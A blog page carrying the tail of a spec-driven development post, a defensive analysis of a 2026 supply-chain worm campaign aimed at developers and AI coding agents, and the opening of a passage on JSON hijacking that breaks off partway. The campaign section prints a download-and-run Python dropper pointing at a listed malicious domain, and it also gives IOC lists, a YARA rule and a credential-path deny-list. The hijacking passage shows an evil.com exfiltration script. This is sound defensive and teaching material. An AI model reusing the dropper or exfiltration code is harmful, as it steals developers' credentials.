<code>/speckit.tasks</code></h3><p>Splits the plan into tasks with explicit dependencies.</p><h3 id="6-speckit-analyze">6. 
<code>/speckit.analyze</code></h3><p>This is the step that makes the biggest difference in SDD.</p><p>It checks whether the:</p><ul><li>constitution</li><li>spec</li><li>plan</li><li>tasks</li></ul><p>contradict one another.</p><p>Any inconsistency it finds has to be resolved before code generation proceeds.</p><p>This is no longer a “manual review”.</p><p>It acts as a real automated gate.</p><h3 id="7-speckit-implement">7. <code>/speckit.implement</code></h3><p>Only after every gate passes does the agent start implementing.</p><h2 id="6-nh-ng-c-i-b-y-ph-bi-n">6. Common pitfalls</h2><p>SDD is not free.</p><p>Used the wrong way, it can be even worse than vibe coding.</p><h3 id="vi-t-spec-kh-ng-l-tr-c-khi-code">Writing a giant spec before any code</h3><p>This is the fastest way back to Waterfall.</p><p>A spec should come with a continuous feedback loop:</p><ul><li>linter</li><li>type checker</li><li>test</li><li>CI</li><li>AI review</li></ul><h3 id="tr-n-what-v-how-qu-s-m">Mixing WHAT and HOW too early</h3><p>Once a spec is tied to a specific technology, it can no longer be reviewed independently.</p><p>Changing the stack then means rewriting the spec.</p><h3 id="bi-n-ide-rules-th-nh-spec-">Treating IDE rules as a “spec”</h3><p>A rules file in your IDE is not a spec.</p><p>It usually:</p><ul><li>is not versioned as a requirement</li><li>has no traceability</li><li>has no validation gate</li></ul><p>It is just config.</p><h3 id="spec-d-i-h-n-c-code">A spec longer than the code</h3><p>This is usually a sign of over-engineering.</p><p>If a feature is simple enough to explain in 30 seconds, do not turn it into a 20-page document.</p><h2 id="7-k-t-lu-n">7. 
Conclusion</h2><p>A spec is not paperwork for reporting to management.</p><p>In the age of AI agents, the spec is how you keep a system from drifting away from the original human intent.</p><p>It helps to:</p><ul><li>get the AI to implement things correctly</li><li>keep the team speaking the same language</li><li>keep requirement changes under control</li><li>most importantly, reduce the “surprise bugs” that show up later</li></ul><p>A small feature in your next sprint is a great place to try SDD.</p><p>Write the spec first, define clear acceptance criteria, let Claude Code run the whole workflow, then compare the result with your old approach.</p>
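<p>As a starting point for that experiment, here is a minimal plain-JavaScript sketch (not Spec-Kit output) of what traceability from the bookmark acceptance criteria in section 3 into code can look like. Each rule carries the AC it comes from, and one small check per AC plays the role of Layer 4. The in-memory store, the function names, the <code>{ status, code }</code> result shape, the <code>409 BOOKMARK_DUPLICATE</code> response for AC-5 and the <code>URL_REQUIRED</code> code are assumptions. The spec in this article only fixes AC-2's <code>400 URL_SCHEME_INVALID</code> and AC-7's <code>404</code>.</p>
<pre><code class="language-javascript">// Hypothetical bookmark service: every rule points back to a spec item.
const bookmarks = [];
let nextId = 1;

function createBookmark(userId, rawUrl) {
  // Edge case from the spec: surrounding whitespace is trimmed first
  const url = typeof rawUrl === "string" ? rawUrl.trim() : rawUrl;
  if (typeof url !== "string" || url === "") {
    return { status: 400, code: "URL_REQUIRED" };
  }
  if (url.length > 2048) return { status: 400, code: "URL_TOO_LONG" };
  // AC-2 / constitution: only http(s), so javascript: and data: are rejected
  if (!/^https?:\/\//i.test(url)) {
    return { status: 400, code: "URL_SCHEME_INVALID" };
  }
  // AC-5: no duplicate bookmark for the same user
  if (bookmarks.some((b) => b.userId === userId && b.url === url)) {
    return { status: 409, code: "BOOKMARK_DUPLICATE" };
  }
  const bookmark = { id: nextId++, userId, url };
  bookmarks.push(bookmark);
  return { status: 201, bookmark };
}

function deleteBookmark(userId, id) {
  const index = bookmarks.findIndex((b) => b.id === id);
  // AC-7: someone else's bookmark looks exactly like a missing one (404, not 403)
  if (index === -1 || bookmarks[index].userId !== userId) {
    return { status: 404, code: "NOT_FOUND" };
  }
  bookmarks.splice(index, 1);
  return { status: 204 };
}

// Layer 4: one automated check per AC (a real project would use a test runner)
const checks = {
  "AC-2": createBookmark("alice", "javascript:alert(1)").code === "URL_SCHEME_INVALID",
  "AC-5": createBookmark("alice", "https://a.dev").status === 201 &&
          createBookmark("alice", "https://a.dev").status === 409,
  "AC-7": deleteBookmark("bob", 1).status === 404,
};
console.log(checks);
</code></pre>
<p>In a real project each entry in <code>checks</code> would be a named test in your test runner, so a missing test for an AC is easy to spot in review or CI.</p>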
</article>
<article>
<h1>Attacks in the AI Era: When Malware Targets AI Coding Tools</h1>
<p>Đ.Q.H — Tue, 23 Jun 2026 09:07:37 GMT</p>
<!--kg-card-begin: markdown--><h2 id="1giithiu">1. Introduction</h2>
<p>In less than 3 weeks, the security community witnessed a chain of closely related events:</p>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-05-19</td>
<td>Microsoft <code>durabletask</code> compromised on PyPI</td>
</tr>
<tr>
<td>2026-06-03</td>
<td><code>binding.gyp</code> worm spreads across the npm ecosystem</td>
</tr>
<tr>
<td>2026-06-05</td>
<td>Miasma worm compromises 73 Microsoft repositories</td>
</tr>
</tbody>
</table>
<p>These events are <strong>not independent attacks</strong>. They are successive stages of a single campaign aimed at:</p>
<ul>
<li>Stealing credentials</li>
<li>Taking over maintainer accounts</li>
<li>Self-replicating through the supply chain</li>
<li>Attacking AI coding workflows</li>
<li>Extending control over the entire developer ecosystem</li>
</ul>
<p>Initial analysis by <strong>StepSecurity</strong> links the campaign to the <em>TeamPCP</em> group and the <em>Mini Shai-Hulud</em> malware family.</p>
<hr>
<h2 id="2giaion1microsoftdurabletaskbcompromise">2. Phase 1: Microsoft DurableTask compromised</h2>
<h3 id="mctiu">Goal</h3>
<p>Take over a <strong>highly trusted</strong> package.</p>
<ul>
<li>Targeted package: <code>durabletask</code></li>
<li>Average downloads: <strong>~400,000 per month</strong></li>
<li>Malicious versions: <strong>1.4.1 · 1.4.2 · 1.4.3</strong></li>
</ul>
<h3 id="kintrctncng">Attack architecture</h3>
<pre><code class="language-text">Developer
  → pip install durabletask
  → Malicious Code
  → Download rope.pyz
  → Credential Theft
  → Cloud Accounts
  → Lateral Movement
</code></pre>
<h3 id="payloaddropper">Payload Dropper</h3>
<p>According to the analysis, only about <strong>14 lines of code</strong> were added to the package, yet that was enough to download a much larger payload, <code>rope.pyz</code>, which performs:</p>
<ul>
<li>AWS credential harvesting</li>
<li>Azure credential harvesting</li>
<li>GCP credential harvesting</li>
<li>GitHub token theft</li>
<li>Kubernetes token theft</li>
<li>Password manager extraction</li>
</ul>
<h3 id="vddropper">Dropper example</h3>
<pre><code class="language-python">import urllib.request
import subprocess
import tempfile

url = "https://check.git-service.com/rope.pyz"

tmp = tempfile.mktemp()

urllib.request.urlretrieve(url, tmp)

subprocess.Popen(
    ["python3", tmp],
    stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL
)
</code></pre>
<hr>
<h2 id="3giaion2wormhasupplychain">3. Phase 2: Turning the supply chain into a worm</h2>
<p>After stealing tokens and credentials, the malware switches to <strong>self-replication</strong>. This is the core difference between the two models:</p>
<pre><code class="language-text">Traditional Supply Chain Attack:
  Compromise → Steal data → Exit

Worm Supply Chain Attack:
  Compromise → Steal data → Compromise maintainer
  → Publish malware → Infect more maintainers → (repeat)
</code></pre>
<h3 id="bindinggypworm">Binding.gyp Worm</h3>
<p>StepSecurity found the malware spreading through <code>binding.gyp</code> files in the <strong>npm</strong> ecosystem.</p>
<pre><code class="language-text">Compromised Machine
  → Steal GitHub Token
  → Access Repository  ◄────────────┐
  → Modify Package                  │
  → npm publish                     │
  → New Victims                     │
  → More Tokens  ───────────────────┘  (loop)
</code></pre>
<h3 id="pseudocode">Pseudo Code</h3>
<pre><code class="language-javascript">const token = process.env.GITHUB_TOKEN;

if (token) {
    infectRepository();
    publishNewVersion();
}
</code></pre>
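<p>Why is a <code>binding.gyp</code> file enough to run code? npm documents that when a package has a <code>binding.gyp</code> at its root and defines no <code>install</code> or <code>preinstall</code> script of its own, npm runs <code>node-gyp rebuild</code> at install time. A defensive audit should therefore flag both explicit lifecycle scripts and this implicit build. The sketch below is a hypothetical helper, not a StepSecurity tool. It walks the top level of a local <code>node_modules</code> folder, including scoped <code>@scope/name</code> packages but not nested <code>node_modules</code>, and only lists candidates for manual review. It does not decide what is malicious.</p>
<pre><code class="language-javascript">const fs = require("fs");
const path = require("path");

const LIFECYCLE = ["preinstall", "install", "postinstall"];

// Install-time hooks a package would run, given its parsed package.json
// and whether a binding.gyp file sits at the package root.
function installHooks(pkg, hasBindingGyp) {
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE.filter((name) => typeof scripts[name] === "string");
  // npm's default: binding.gyp with no install/preinstall script => node-gyp rebuild
  if (hasBindingGyp && !scripts.install && !scripts.preinstall) {
    hooks.push("install (implicit: node-gyp rebuild)");
  }
  return hooks;
}

// Audit the top-level packages in root/node_modules, including @scope/name.
// Nested node_modules folders are not visited in this sketch.
function auditNodeModules(root) {
  const dir = path.join(root, "node_modules");
  if (!fs.existsSync(dir)) return [];
  const pkgDirs = [];
  for (const entry of fs.readdirSync(dir)) {
    if (entry.startsWith(".")) continue; // skips .bin, .package-lock.json
    const full = path.join(dir, entry);
    if (entry.startsWith("@")) {
      for (const sub of fs.readdirSync(full)) pkgDirs.push(path.join(full, sub));
    } else {
      pkgDirs.push(full);
    }
  }
  const findings = [];
  for (const pkgDir of pkgDirs) {
    const manifest = path.join(pkgDir, "package.json");
    if (!fs.existsSync(manifest)) continue;
    const pkg = JSON.parse(fs.readFileSync(manifest, "utf8"));
    const hasGyp = fs.existsSync(path.join(pkgDir, "binding.gyp"));
    const hooks = installHooks(pkg, hasGyp);
    if (hooks.length > 0) findings.push({ name: pkg.name, hooks });
  }
  return findings;
}

console.log(auditNodeModules(process.cwd()));
</code></pre>
<p>Many legitimate native modules will show up in this list. The point is to know which packages execute code at install time, so that a new entry after an update gets a second look.</p>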
<h3 id="tisaonguyhim">Why is this dangerous?</h3>
<p>The malware <strong>no longer depends on a human operator</strong>. It automatically:</p>
<ol>
<li>finds tokens</li>
<li>commits code</li>
<li>publishes packages</li>
<li>infects further targets</li>
</ol>
<p>It follows the same pattern as <em>Code Red</em>, the <em>Morris Worm</em>, and <em>WannaCry</em>, but it plays out in the <strong>developer ecosystem</strong> instead of at the network layer.</p>
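<p>A toy model makes the "no operator needed" point concrete. In the hypothetical graph below, each maintainer owns some packages and installs others. Once a maintainer's token is stolen, every package they own receives a malicious version, and every maintainer who installs one of those is compromised in turn. The names, the data and the <code>simulateWorm</code> function are invented for illustration. Real spread also depends on token scopes, 2FA and how quickly bad versions are pulled.</p>
<pre><code class="language-javascript">// Hypothetical ecosystem: who maintains which package, and who installs what.
const owns = {
  alice: ["left-pad-x"],
  bob: ["gyp-utils"],
  carol: ["fmt-lite"],
  dave: [],
};
const installs = {
  alice: [],
  bob: ["left-pad-x"],
  carol: ["gyp-utils"],
  dave: ["fmt-lite"],
};

// Breadth-first spread: a stolen token poisons every package the victim owns,
// and every maintainer who installs a poisoned package becomes the next victim.
function simulateWorm(patientZero) {
  const compromised = new Set([patientZero]);
  const poisoned = new Set();
  const queue = [patientZero];
  const spread = []; // "victim -> newly infected" events, in order
  while (queue.length > 0) {
    const victim = queue.shift();
    for (const pkg of owns[victim]) poisoned.add(pkg);
    for (const [dev, deps] of Object.entries(installs)) {
      if (!compromised.has(dev) && deps.some((d) => poisoned.has(d))) {
        compromised.add(dev);
        queue.push(dev);
        spread.push(`${victim} -> ${dev}`);
      }
    }
  }
  return { compromised: [...compromised], poisoned: [...poisoned], spread };
}

console.log(simulateWorm("alice"));
</code></pre>
<p>No step in the loop needs a human decision, which is exactly what separates the worm model from a one-off supply chain compromise.</p>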
<hr>
<h2 id="4giaion3miasmaworm">4. Phase 3: Miasma Worm</h2>
<p>On <strong>June 5, 2026</strong>, the campaign escalated further. Instead of package registries (PyPI, npm), Miasma began attacking <strong>GitHub repositories</strong> directly.</p>
<h3 id="iugmi">What is new?</h3>
<p>The payload no longer waits for <code>import package</code> or <code>npm install</code>. It is designed to trigger when:</p>
<ul>
<li><strong>A folder is opened in an IDE</strong></li>
<li><strong>An AI coding agent scans the repository</strong></li>
</ul>
<h3 id="aiagentattacksurface">AI Agent Attack Surface</h3>
<p>Miasma targets popular AI coding agents and AI-enabled editors:</p>
<ul>
<li>Claude Code</li>
<li>Gemini CLI</li>
<li>Cursor</li>
<li>VS Code</li>
</ul>
<pre><code class="language-text">Developer
  → Clone Repository
  → Open in Cursor
  → AI Agent Reads Files
  → Malicious Script
  → Credential Theft
  → Repository Takeover
</code></pre>
<h3 id="repositoryinjection">Repository Injection</h3>
<p>According to StepSecurity, GitHub <strong>disabled the affected Microsoft repositories as an emergency measure</strong> to stop further spread:</p>
<blockquote>
<p><strong>73 repositories</strong> compromised; GitHub disabled all of them within <strong>105 seconds</strong>.</p>
</blockquote>
<hr>
<h2 id="5chuikillchainhonchnh">5. The complete kill chain</h2>
<p>The whole campaign forms a self-sustaining loop in which the output of the last stage becomes the input of the first:</p>
<pre><code class="language-text">Compromise Package  ◄──────────────────┐
  → Credential Theft                    │
  → Steal GitHub Token                  │
  → Compromise Repository               │
  → Inject Malware                      │
  → AI Agent Execution                  │
  → New Credential Theft                │
  → Publish New Packages  ──────────────┘  (closed loop)
</code></pre>
<hr>
<h2 id="6sosnh3giaion">6. Comparing the 3 phases</h2>
<table>
<thead>
<tr>
<th>Phase</th>
<th>Target</th>
<th>Trigger</th>
<th>Spread</th>
</tr>
</thead>
<tbody>
<tr>
<td>DurableTask</td>
<td>PyPI Registry</td>
<td><code>import</code></td>
<td>Limited — Package</td>
</tr>
<tr>
<td>Binding.gyp</td>
<td>npm Ecosystem</td>
<td><code>install</code></td>
<td>Medium — Maintainer</td>
</tr>
<tr>
<td>Miasma</td>
<td>GitHub + AI Agents</td>
<td>IDE Open</td>
<td><strong>High — Repository + AI</strong></td>
</tr>
</tbody>
</table>
<hr>
<h2 id="7indicatorsofcompromiseioc">7. Indicators of Compromise (IOC)</h2>
<p><strong>Domains</strong></p>
<pre><code class="language-text">check.git-service.com
git-service.com
t.m-kosche.com
</code></pre>
<p><strong>Suspicious Files</strong></p>
<pre><code class="language-text">rope.pyz
setup.js
transformers.pyz
</code></pre>
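<p>The IOCs above can be checked with a few lines of Node.js. This is a hypothetical helper, not a StepSecurity tool. It walks a directory, flags files whose name is one of the suspicious file names, and flags files whose text contains one of the listed domains. Note that <code>setup.js</code> is also a common legitimate file name, so a name match on its own is only a lead for manual review. Because <code>git-service.com</code> is a substring of <code>check.git-service.com</code>, a file containing the longer domain reports both.</p>
<pre><code class="language-javascript">const fs = require("fs");
const path = require("path");

// IOCs copied from the lists above
const IOC_DOMAINS = ["check.git-service.com", "git-service.com", "t.m-kosche.com"];
const IOC_FILES = ["rope.pyz", "setup.js", "transformers.pyz"];

// Check one file by name and content; returns the reasons it matched.
function matchIocs(fileName, text) {
  const reasons = [];
  if (IOC_FILES.includes(fileName)) reasons.push(`file name ${fileName}`);
  for (const domain of IOC_DOMAINS) {
    if (text.includes(domain)) reasons.push(`domain ${domain}`);
  }
  return reasons;
}

// Walk a directory tree (skipping .git). Files larger than maxBytes are
// matched by name only. Read as latin1 so binary files never fail to decode.
function scanDir(dir, maxBytes = 5 * 1024 * 1024, hits = []) {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      if (entry.name !== ".git") scanDir(full, maxBytes, hits);
    } else if (entry.isFile()) {
      const small = fs.statSync(full).size <= maxBytes;
      const text = small ? fs.readFileSync(full, "latin1") : "";
      const reasons = matchIocs(entry.name, text);
      if (reasons.length > 0) hits.push({ file: full, reasons });
    }
  }
  return hits;
}

// Usage: console.log(scanDir("path/to/repo"));
</code></pre>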
<hr>
<h2 id="8detectionrules">8. Detection Rules</h2>
<h3 id="yararule">YARA Rule</h3>
<pre><code class="language-yara">rule Miasma_Rope_Payload
{
    strings:
        $a = "git-service.com"
        $b = "rope.pyz"
        $c = "kubectl exec"

    condition:
        any of them
}
</code></pre>
<h3 id="githubactionsdetection">GitHub Actions Detection</h3>
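<pre><code class="language-yaml">- name: Detect unexpected publish
  run: |
    # List recent commits that touched package manifests or build hooks
    # (needs full history, e.g. actions/checkout with fetch-depth: 0)
    git log --since="1 day ago" --name-only --pretty=format:'%h %an %s' -- package.json setup.py pyproject.toml binding.gyp
</code></pre>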
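<p>Commit history alone does not show what reached the registry. One complementary check, sketched here under assumptions, reads the public npm registry metadata for packages you maintain. The package document at <code>https://registry.npmjs.org/&lt;name&gt;</code> contains a <code>time</code> object that maps each version to its publish timestamp, so a version you did not release yourself stands out. The function names and the 24-hour window are hypothetical. <code>fetch</code> is the global available in Node.js 18+.</p>
<pre><code class="language-javascript">// Versions whose publish time falls inside the last `windowMs` milliseconds.
// `time` is the registry's map of version -> ISO timestamp (plus
// "created" and "modified", which are skipped).
function recentVersions(time, now = Date.now(), windowMs = 24 * 60 * 60 * 1000) {
  return Object.entries(time)
    .filter(([version]) => version !== "created" && version !== "modified")
    .filter(([, iso]) => now - Date.parse(iso) <= windowMs)
    .map(([version, iso]) => ({ version, publishedAt: iso }));
}

// Fetch a package's metadata from the public npm registry
// (global fetch, Node.js 18+). Scoped names are sent as @scope%2Fname.
async function checkPackage(name) {
  const url = `https://registry.npmjs.org/${name.replace("/", "%2F")}`;
  const res = await fetch(url);
  if (!res.ok) throw new Error(`registry returned ${res.status} for ${name}`);
  const packument = await res.json();
  return recentVersions(packument.time || {});
}

// Usage (needs network access; "your-package" is a placeholder):
// checkPackage("your-package").then((versions) => console.log(versions));
</code></pre>
<p>Run on a schedule, this turns "a version appeared that nobody on the team published" into an alert instead of a discovery weeks later.</p>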
<hr>
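<h2 id="9phngthmitigation">9. Defense & Mitigation</h2>
<p><strong>1. Trusted Publishing.</strong> Instead of storing a long-lived <code>PYPI_API_TOKEN</code>, switch to <strong>OIDC Trusted Publishing</strong>. The registry then only accepts uploads from the CI workflow you have registered, using short-lived tokens, so there is no reusable upload token for malware to steal.</p>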
<p><strong>2. Dependency Pinning.</strong></p>
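<pre><code class="language-bash">pip install package==version                      # placeholders: exact version
pip install --require-hashes -r requirements.txt  # stricter: hash-pinned
</code></pre>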
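<p>For npm, the equivalent of <code>package==version</code> is an exact version in <code>package.json</code> (no <code>^</code> or <code>~</code> range), ideally combined with a committed lockfile and <code>npm ci</code>. The hypothetical helper below lists the dependencies that are not pinned exactly. It deliberately treats anything other than a plain <code>x.y.z</code> version, such as ranges, dist-tags, git or URL specs, as unpinned.</p>
<pre><code class="language-javascript">// Plain semver "x.y.z" with optional prerelease/build suffix, e.g. 1.4.0 or 2.0.0-rc.1
const EXACT = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

// Return "name@spec" for every dependency that is not pinned to an exact version.
function unpinnedDeps(pkg) {
  const sections = ["dependencies", "devDependencies", "optionalDependencies"];
  const loose = [];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      if (!EXACT.test(spec)) loose.push(`${name}@${spec}`);
    }
  }
  return loose;
}

// Usage (reads ./package.json):
// const pkg = JSON.parse(require("fs").readFileSync("package.json", "utf8"));
// console.log(unpinnedDeps(pkg));
</code></pre>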
<p><strong>3. Commit SHA Pinning.</strong> Pin to a commit SHA instead of a mutable tag:</p>
<pre><code class="language-yaml">uses: org/action@8f4d1d2   # ✓ pin to a commit SHA (shortened here; use the full 40-character SHA)
# uses: org/action@v1       # ✗ avoid mutable tags
</code></pre>
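<p>Pinning is only useful if every reference is pinned, so it helps to lint workflow files for it. The hypothetical check below flags each <code>uses:</code> reference whose version part is not a full 40-hex-character commit SHA. For simplicity it skips local actions (<code>./path</code>) and <code>docker://</code> references, ignores commented-out lines, and works line by line with a regex rather than a YAML parser, so treat it as a lint sketch.</p>
<pre><code class="language-javascript">// Flag `uses:` references that are not pinned to a full 40-hex-character commit SHA.
function unpinnedActions(workflowText) {
  const findings = [];
  workflowText.split("\n").forEach((line, i) => {
    const m = line.match(/^\s*(?:-\s*)?uses:\s*["']?([^\s"'#]+)/);
    if (!m) return; // not a uses: line (commented-out lines start with #)
    const ref = m[1];
    if (ref.startsWith("./") || ref.startsWith("docker://")) return;
    const at = ref.lastIndexOf("@");
    const version = at === -1 ? "" : ref.slice(at + 1);
    if (!/^[0-9a-f]{40}$/i.test(version)) {
      findings.push({ line: i + 1, ref });
    }
  });
  return findings;
}

// Usage:
// const text = require("fs").readFileSync(".github/workflows/ci.yml", "utf8");
// console.log(unpinnedActions(text));
</code></pre>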
<p><strong>4. Runtime Monitoring.</strong> Following the <strong>Harden-Runner</strong> model, detect anomalous behavior: network calls, process spawning, secret access.</p>
<p><strong>5. AI Agent Sandboxing.</strong> Do not let the AI agent read credential files, access cloud configuration, or execute scripts automatically.</p>
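<p>Here is one way "do not let the agent read credential files" can look in code. The hypothetical policy function below resolves a path the agent wants to read and refuses it if it points into common credential locations under the home directory or has a well-known secret file name. The deny-list is an illustrative, incomplete assumption (for example, it does not cover <code>.env.local</code>), it assumes POSIX-style paths, and it does not resolve symlinks. In practice such rules belong in the agent's own permission settings or an OS-level sandbox rather than in ad-hoc code.</p>
<pre><code class="language-javascript">const os = require("os");
const path = require("path");

// Illustrative, incomplete deny-list (directories relative to the home directory)
const DENY_DIRS = [".aws", ".azure", ".config/gcloud", ".kube", ".ssh", ".docker"];
// File names refused anywhere on disk
const DENY_NAMES = [".env", ".npmrc", ".pypirc", ".git-credentials", ".netrc"];

// Return true if the agent may read `requested`, resolved against `cwd`.
// Note: symlinks are not resolved here; a real check would use fs.realpathSync.
function agentMayRead(requested, cwd = process.cwd(), home = os.homedir()) {
  const expanded = requested.replace(/^~(?=$|\/)/, home);
  const full = path.resolve(cwd, expanded);
  if (DENY_NAMES.includes(path.basename(full))) return false;
  return !DENY_DIRS.some((dir) => {
    const blocked = path.join(home, dir);
    return full === blocked || full.startsWith(blocked + path.sep);
  });
}

console.log(agentMayRead("~/.aws/credentials", "/work", "/home/dev")); // false
console.log(agentMayRead("src/index.js", "/work", "/home/dev"));       // true
</code></pre>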
<hr>
<h2 id="10cngcphngthtakumiguard">10. Defense tooling: Takumi Guard</h2>
<p>One concrete way to put the defenses above into practice is <strong>Takumi Guard</strong>. It acts as a <em>secure registry proxy</em> that sits between your machine and npm/PyPI and automatically blocks malicious packages <strong>before they can be downloaded and executed</strong> (exactly the kind of payload that <code>rope.pyz</code> represents; <code>@panda-guard/test-malicious</code> is a test package used below to verify the setup).</p>
<blockquote>
<p>🛡️ <strong>Takumi Guard</strong>: blocks malicious packages at install time; supports npm · pip · yarn · bun.<br>
Registry: <code>npm.flatt.tech</code> · <code>pypi.flatt.tech</code></p>
</blockquote>
<h3 id="yucutrckhicit">⚠️ Prerequisites</h3>
<p>You need <strong>npm (Node.js)</strong> and <strong>pip (Python)</strong> installed. Check with:</p>
<pre><code class="language-bash"># Check npm (Node.js)
node -v
npm -v

# Check pip (Python)
python --version
pip --version
</code></pre>
<ul>
<li>If <strong>npm</strong> is missing: download and install Node.js from the official website.</li>
<li>If <strong>pip</strong> is missing: it normally ships with Python; make sure it is on your <code>PATH</code>.</li>
</ul>
<h3 id="bc01ngktokenbngemailquacurl">Step 01: Request a token by email with curl</h3>
<p>Send a token request to the API; the service emails the token to you.</p>
<pre><code class="language-bash">curl -X POST https://npm.flatt.tech/api/v1/tokens \
  -H "Content-Type: application/json" \
  -d '{"email": "your_email@vietnamlab.vn", "language": "en"}'
</code></pre>
<h3 id="bc02lytokentemail">Step 02: Get the token from the email</h3>
<p>Check your inbox and star or flag the message so you can find it again if you ever need to regenerate the token. The token looks like this:</p>
<pre><code class="language-text">tg_....................   ✓ Token Format
</code></pre>
<h3 id="bc03cuhnhpackagemanager">Step 03: Configure your package manager</h3>
<p>Point the registry at Takumi Guard and attach the token. Replace <code>tg_YOUR_TOKEN</code> with your real token.</p>
<pre><code class="language-bash"># npm setup
npm config set registry https://npm.flatt.tech/
npm config set //npm.flatt.tech/:_authToken tg_YOUR_TOKEN

# Python (pip) setup
pip config set global.index-url https://token:tg_YOUR_TOKEN@pypi.flatt.tech/simple/
</code></pre>
<pre><code class="language-yaml"># yarn (v2+): add to .yarnrc.yml
npmRegistryServer: "https://npm.flatt.tech/"
npmAuthToken: "tg_YOUR_TOKEN"
</code></pre>
<pre><code class="language-toml"># bun: add to bunfig.toml
[install]
registry = { url = "https://npm.flatt.tech/", token = "tg_YOUR_TOKEN" }
</code></pre>
<h3 id="bc04kimtracit">Step 04: Verify the setup</h3>
<p>Try installing a simulated malicious package. If the install is blocked with a <code>403 Forbidden</code> error, Takumi Guard is working correctly: <strong>blocked means success</strong>.</p>
<pre><code class="language-text">$ npm install @panda-guard/test-malicious
npm error code E403
npm error 403 Forbidden - GET https://npm.flatt.tech/...
npm error 403 In most cases, you or one of your dependencies are requesting
npm error 403 a package version that is forbidden by your security policy, or
npm error 403 on a server you do not have access to.
npm error A complete log of this run can be found in:
npm error /Users/administrator/.npm/_logs/2026-04-21T07_37_18_247Z-debug-0.log
</code></pre>
<p>✓ <strong>Success: the malicious package was blocked.</strong></p>
<h3 id="trnghpmthochthntoken">🔑 Lost or expired token</h3>
<p>If you lose your token or it expires, repeat <strong>Step 01</strong> to receive a new email. It contains reset instructions along with a <code>code</code> value:</p>
<pre><code class="language-bash"># Lost your key completely? (the --json flag needs curl 7.82 or later)
curl -X POST https://npm.flatt.tech/api/v1/tokens/reset \
  --json '{"email": "your_email@vietnamlab.vn", "code": "XXXXXXXX"}'
</code></pre>
<p><strong>Important:</strong></p>
<ul>
<li>This command <strong>invalidates</strong> your current token.</li>
<li>The reset <code>code</code> expires <strong>1 hour</strong> after it is requested.</li>
</ul>
<hr>
<h2 id="11ktlun">11. Conclusion</h2>
<p>The <em>DurableTask → Binding.gyp → Miasma</em> chain of events reveals a new trend:</p>
<blockquote>
<p>"Malware no longer attacks only end users; it now attacks developers themselves and the software development ecosystem."</p>
</blockquote>
<p>The combination of <strong>Supply Chain Attack</strong> + <strong>Self-Replicating Worm</strong> + <strong>Credential Theft</strong> + <strong>AI Agent Targeting</strong> has created a new class of threat that many current DevSecOps models were not designed to defend against.</p>
<p>If <strong>SolarWinds</strong> was the best-known supply chain attack of the previous decade, <strong>Miasma</strong> may be the first example of an <em>"AI-aware software supply chain worm"</em>: a worm optimized for the era of AI coding assistants and open-source ecosystems.</p>
<h2 id="12ngunthamkho">12. References</h2>
<p><a href="https://www.stepsecurity.io/blog/microsofts-durabletask-pypi-package-compromised-in-supply-chain-attack">https://www.stepsecurity.io/blog/microsofts-durabletask-pypi-package-compromised-in-supply-chain-attack</a><br>
<a href="https://www.stepsecurity.io/blog/binding-gyp-npm-supply-chain-attack-spreads-like-worm">https://www.stepsecurity.io/blog/binding-gyp-npm-supply-chain-attack-spreads-like-worm</a><br>
<a href="https://www.stepsecurity.io/blog/miasma-worm-hits-microsoft-again-azure-functions-action-and-72-other-repositories-disabled-after-supply-chain-attack-targeting-ai-coding-agents">https://www.stepsecurity.io/blog/miasma-worm-hits-microsoft-again-azure-functions-action-and-72-other-repositories-disabled-after-supply-chain-attack-targeting-ai-coding-agents</a></p>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>The Secret Behind the Strange Characters in Big Tech API Responses</h1>
<p>Đào Minh Nhật — Mon, 22 Jun 2026 09:32:16 GMT</p>
<!--kg-card-begin: markdown--><h2 id="giithiu">Introduction</h2>
<p>Have you ever opened DevTools, captured an API response from Google or Messenger, and been surprised to see the start of the data look like this?</p>
<pre><code>)]}'\n[{"id": 1, "name": "Alice"}, ...]
</code></pre>
<p>Or even a <code>while(1);</code> or <code>for(;;);</code> loop right before the JSON starts?</p>
<p>This is not a bug. It is a deliberate defensive technique, designed to counter a vulnerability called <strong>JSON Hijacking</strong>. This article walks through how the attack works step by step, how the big tech companies counter it, and why they still keep the technique today.</p>
<hr>
<h2 id="nidungchnh">Main content</h2>
<h3 id="1jsonhijackinglg">1. What is JSON Hijacking?</h3>
<p>JSON Hijacking is an attack that exploits a combination of two browser behaviors:</p>
<ul>
<li><strong>Same Origin Policy (SOP):</strong> The browser prevents a page from reading responses from another origin through APIs such as <code>fetch</code> or <code>XMLHttpRequest</code> (unless the server explicitly allows it via CORS).</li>
<li><strong>The <code><script></code> tag is an exception:</strong> The browser <em>always allows</em> a page to load and execute JavaScript from any domain through a <code><script></code> tag, including third-party domains.</li>
</ul>
<p>And that is the hole.</p>
<hr>
<h3 id="2cchtncngstepbystep">2. How the attack works, step by step</h3>
<p><strong>Step 1: The victim is logged in to Google</strong></p>
<p>The user has a Gmail tab open, which means the browser holds a Google session cookie.</p>
<p><strong>Step 2: The attacker lures the victim to a malicious page</strong></p>
<p>The attacker builds a web page containing code like this:</p>
<pre><code class="language-html"><!-- Attacker's page: evil.com -->
<script>
  // Override the Array constructor before the JSON loads.
  // This only worked in old (pre-ES5) engines; modern engines build
  // array literals with the built-in Array and ignore this override.
  function Array() {
    // "this" is the array created while the response is evaluated;
    // sendToAttacker is a hypothetical exfiltration helper
    sendToAttacker(this);
  }
</script>

<!-- Illustrative endpoint: the browser automatically attaches the Google cookie to this request -->
<script src="https://mail.google.com/mail/feed/atom"></script>
</code></pre>
<p><strong>Step 3: The browser does the attacker's work</strong></p>
<p>When the victim visits <code>evil.com</code>:</p>
<ol>
<li>The browser sees a <code><script></code> tag pointing to <code>mail.google.com</code>.</li>
<li>Because the victim is logged in to Google, the browser <strong>automatically attaches the cookie</strong> to the request.</li>
<li>Google returns JSON data, for example an array of emails: <code>[{"subject": "...", "from": "..."}]</code>.</li>
<li>The browser tries to execute this JSON array as JavaScript.</li>
<li>Because <code>Array()</code> was overridden beforehand, the attacker <strong>captures the entire payload</strong>.</li>
</ol>
<blockquote>
